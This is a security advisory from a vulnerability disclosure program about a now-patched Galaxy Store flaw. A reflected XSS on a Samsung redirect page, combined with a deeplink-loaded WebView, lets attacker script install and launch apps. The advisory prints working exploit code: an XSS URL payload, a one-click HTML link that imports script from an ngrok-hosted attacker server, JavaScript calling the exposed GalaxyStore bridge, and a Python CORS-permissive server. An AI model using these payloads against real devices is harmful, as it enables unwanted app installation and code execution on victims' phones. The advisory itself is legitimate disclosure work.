SSD Secure Disclosure
TL;DR
A vulnerability in the Galaxy Store allows attackers through an XSS to cause the store to install and/or launch an application, allowing remote attackers to trigger a remote command execution in the phone.
Vulnerability Summary
In the Galaxy Store application, there are some deeplinks handled. Deeplink can be called from another application or from a browser. When receiving suitable deeplinks Galaxy Store will process and display them via webview.
Here, by not checking the deeplink securely, when a user accesses a link from a website containing the deeplink, the attacker can execute JS code in the webview context of the Galaxy Store application.
Credit
An independent security researcher has reported this to the SSD Secure Disclosure program.
Affected Versions
Galaxy Store version 4.5.32.4
Technical Analysis
First we will pay attention to a website SamSung MCS Direct Page: https://us.mcsvc.samsung.com/mcp25/devops/redirect.html
When we access the website, it will look like this:
However if you reverse the Galaxy Store app you can find out that they need the following parameters: mcs_ru
and testMode
. Here is the MCS site result with parameters:
We can see that it contains the content of intents that have not been deeplinked to be sent to Samsung’s applications for processing such as Samsung Pay
, Bixby
, Samsungapp
, Gamelauncher
,…
Pay attention here to the deeplinks sent to Samsungapp
. Let’s see an example as follows:samsungapps://MCSLaunch?action=each_event&url={{url}}
, when this deeplink is sent, the Galaxy Store will handle it as follows:
- App will check the deeplink through the string
samsungapps
- Then if there is a string
MCSLaunch
the app will proceed with the MCS Webview process - Finally take the
url
parameter and load it with theWebview.loadurl
There is one interesting thing here, we return to the SamSung MCS Direct Page website. This website will parse the parameter from the url and then display it on the website, but it did not encode, leading to an XSS error as follows:
We can see the website is processing the abc
, def
parameters and displaying as above without encoding, the url is passed directly to href
this is very dangerous and will cause XSS.
A proof of concept would be as simple as:https://us.mcsvc.samsung.com/mcp25/devops/redirect.html?mcs_ru=a&testMode=1&%22id=%22%3Ca%20id%3d%22%3E%3Csvg/onload%3dalert(1)%3E%22%3E
Well it’s a basic error, exploiting is simple.
Now we will proceed to combine it with the Galaxy Store. We observe the deeplink process code and display it on the webview.
webSettings.setJavaScriptEnabled(true); // allow JS execution
webSettings.setJavaScriptCanOpenWindowsAutomatically(true);
WebView webView = this.c;
webView.addJavascriptInterface(new McsWebBridge(this, webView, new McsWebBridgeProvider()), "McsBridge");
WebView webView2 = this.c;
webView2.addJavascriptInterface(new McsWebBridge(this, webView2, new GmpWebBridgeProvider()), "GmpBridge");
this.l = new EditorialScriptInterface(this, this.c);
this.c.addJavascriptInterface(this.l, "GalaxyStore"); // add JS interface so that JS can call functions defined in Java class.
We observe the Class EditorialScriptInterface
:
@JavascriptInterface
public void downloadApp(String str){...}
@JavascriptInterface
public void openApp(String str) {...}
We notice the two functions downloadApp
and openApp
here these two functions will get the app id and download them from the store or open them. Thereby we can use JS code to call these two functions. The POC is as simple as this:
window.GalaxyStore.openApp("com.sec.android.app.popupcalculator"); // Open app calc
window.GalaxyStore.downloadApp("com.sec.android.app.popupcalculator");// Download app calc
Proof of concept
We will design a simple website like this:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body>
<a href="samsungapps://MCSLaunch?action=each_event&url=https://us.mcsvc.samsung.com/mcp25/devops/redirect.html?mcs_ru=a%26testMode=1%26%22id=%22%3Ca%2520id%253d%22%3e%3Csvg/onload%253dimport(%27https://xxxxxx.ngrok.io/open.js%27)%3e%22%3e">1 click</a>
</body>
</html>
The file open.js
will open the calc app.
The file download.js
will open the calc app.
The file down_and_open.js
will download then open calc app.
To be able to successfully exploit the victim’s server, it is necessary to have https and CORS bypass of chrome. We will use python and ngrok for setup.
The steps are as follows:
- Run the file
https.py
to bypass CORS and open a server on port 8000 - Run
ngrok http 8000
- On a samsung device, use chrome to access the victim server and click on the link.
Vendor Response
The vendor has issued patches which are now in wide circulation for all Samsung devices.
Exploit
// down_and_open.js
function testCallBack(){
setTimeout(()=>{
window.GalaxyStore.openApp("com.sec.android.app.popupcalculator");
},20000);
window.GalaxyStore.downloadApp("com.sec.android.app.popupcalculator");
}
testCallBack();
// download.js
window.GalaxyStore.downloadApp("com.sec.android.app.popupcalculator");
#!/usr/bin/python3
# https.py
import os
import sys
import http.server
import socketserver
PORT = 8000
class HTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
http.server.SimpleHTTPRequestHandler.end_headers(self)
def server(port):
httpd = socketserver.TCPServer(('', port), HTTPRequestHandler)
return httpd
if __name__ == "__main__":
port = PORT
httpd = server(port)
try:
# os.chdir('build')
print("\nserving from build/ at localhost:" + str(port))
httpd.serve_forever()
except KeyboardInterrupt:
print("\n...shutting down http server")
httpd.shutdown()
sys.exit()
<!-- index.html -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
</head>
<body>
<a
href="samsungapps://MCSLaunch?action=each_event&url=https://us.mcsvc.samsung.com/mcp25/devops/redirect.html?mcs_ru=a%26testMode=1%26%22id=%22%3Ca%2520id%253d%22%3e%3Csvg/onload%253dimport(%27https://cf89a4eb207f.ngrok.io/down_and_open.js%27)%3e%22%3e"
>1 click</a
>
</body>
</html>
// open.js
window.GalaxyStore.openApp("com.sec.android.app.popupcalculator");